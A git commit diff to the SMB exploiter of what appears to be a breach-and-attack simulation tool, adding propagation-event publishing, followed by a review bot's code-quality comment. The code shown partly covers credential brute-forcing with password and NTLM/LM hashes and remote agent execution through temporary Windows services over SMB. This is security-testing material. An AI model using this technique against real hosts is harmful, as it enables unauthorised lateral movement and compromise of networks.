Agent: Publish propagation events
This commit is contained in:
parent
c631755397
commit
7b13817b66
|
@ -69,7 +69,7 @@ class SMBExploiter(HostExploiter):
|
||||||
def _exploit_host(self):
|
def _exploit_host(self):
|
||||||
|
|
||||||
dest_path = get_agent_dst_path(self.host)
|
dest_path = get_agent_dst_path(self.host)
|
||||||
remote_full_path, creds = self._exploit(dest_path)
|
remote_full_path, creds, timestamp = self._exploit(dest_path)
|
||||||
|
|
||||||
if not self.exploit_result.exploitation_success:
|
if not self.exploit_result.exploitation_success:
|
||||||
if self._is_interrupted():
|
if self._is_interrupted():
|
||||||
|
@ -93,7 +93,7 @@ class SMBExploiter(HostExploiter):
|
||||||
|
|
||||||
return self.exploit_result
|
return self.exploit_result
|
||||||
|
|
||||||
self._run_agent_on_victim(scmr_rpc, cmdline)
|
self._run_agent_on_victim(scmr_rpc, cmdline, timestamp)
|
||||||
|
|
||||||
logger.info(
|
logger.info(
|
||||||
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
||||||
|
@ -112,7 +112,7 @@ class SMBExploiter(HostExploiter):
|
||||||
)
|
)
|
||||||
return self.exploit_result
|
return self.exploit_result
|
||||||
|
|
||||||
def _exploit(self, dest_path: PurePath) -> Tuple[Optional[str], SelectedCredentials]:
|
def _exploit(self, dest_path: PurePath) -> Tuple[Optional[str], SelectedCredentials, float]:
|
||||||
agent_binary = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
|
agent_binary = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
|
||||||
creds = generate_brute_force_combinations(self.options["credentials"])
|
creds = generate_brute_force_combinations(self.options["credentials"])
|
||||||
for user, password, lm_hash, ntlm_hash in interruptible_iter(creds, self.interrupt):
|
for user, password, lm_hash, ntlm_hash in interruptible_iter(creds, self.interrupt):
|
||||||
|
@ -163,7 +163,7 @@ class SMBExploiter(HostExploiter):
|
||||||
self._publish_exploitation_event(timestamp, False, error_message=message)
|
self._publish_exploitation_event(timestamp, False, error_message=message)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
return remote_full_path, SelectedCredentials(user, password, lm_hash, ntlm_hash)
|
return remote_full_path, SelectedCredentials(user, password, lm_hash, ntlm_hash), timestamp
|
||||||
|
|
||||||
def _get_agent_command(self, remote_full_path: str, dest_path: PurePath) -> str:
|
def _get_agent_command(self, remote_full_path: str, dest_path: PurePath) -> str:
|
||||||
if remote_full_path.lower() != str(dest_path).lower():
|
if remote_full_path.lower() != str(dest_path).lower():
|
||||||
|
@ -220,7 +220,7 @@ class SMBExploiter(HostExploiter):
|
||||||
|
|
||||||
return None
|
return None
|
||||||
|
|
||||||
def _run_agent_on_victim(self, scmr_rpc: DCERPC_v5, cmdline: str):
|
def _run_agent_on_victim(self, scmr_rpc: DCERPC_v5, cmdline: str, start_time: float):
|
||||||
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
|
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
|
||||||
resp = scmr.hROpenSCManagerW(scmr_rpc)
|
resp = scmr.hROpenSCManagerW(scmr_rpc)
|
||||||
sc_handle = resp["lpScHandle"]
|
sc_handle = resp["lpScHandle"]
|
||||||
|
@ -239,15 +239,19 @@ class SMBExploiter(HostExploiter):
|
||||||
resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
|
resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
|
||||||
else:
|
else:
|
||||||
self.exploit_result.error_message = str(err)
|
self.exploit_result.error_message = str(err)
|
||||||
return self.exploit_result
|
self._publish_propagation_event(start_time, False, error_message=str(err))
|
||||||
|
return
|
||||||
|
|
||||||
service = resp["lpServiceHandle"]
|
service = resp["lpServiceHandle"]
|
||||||
try:
|
try:
|
||||||
scmr.hRStartServiceW(scmr_rpc, service)
|
scmr.hRStartServiceW(scmr_rpc, service)
|
||||||
|
self._publish_propagation_event(start_time, True)
|
||||||
status = ScanStatus.USED
|
status = ScanStatus.USED
|
||||||
except Exception:
|
except Exception:
|
||||||
|
message = "Failed to start the service"
|
||||||
|
self._publish_propagation_event(start_time, False, error_message=message)
|
||||||
status = ScanStatus.SCANNED
|
status = ScanStatus.SCANNED
|
||||||
pass
|
|
||||||
self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB))
|
self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB))
|
||||||
scmr.hRDeleteService(scmr_rpc, service)
|
scmr.hRDeleteService(scmr_rpc, service)
|
||||||
scmr.hRCloseServiceHandle(scmr_rpc, service)
|
scmr.hRCloseServiceHandle(scmr_rpc, service)
|
||||||
|
|
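Review bot: In the hunk at -239, the new `except Exception:` branch discards the exception: `message = "Failed to start the service"` is published and sent as telemetry without the failure reason, while the `else:` branch a few lines above does include `str(err)` in its error_message. Binding the exception and including it, e.g. `except Exception as err:` and `message = f"Failed to start the service: {err}"` (with `logger.exception(message)` alongside, since `logger` is already in scope), would make the propagation event as informative as the exploitation one. The same branch sets `status` but leaves `self.exploit_result` untouched, so the caller in `_exploit_host` (earlier hunk) appears to go on to log "Executed monkey" and return its result even though the service never started — worth confirming whether `exploit_result.error_message` should be set here as it is in the `else:` branch. The body of `_run_agent_on_victim` continues past the end of the hunk.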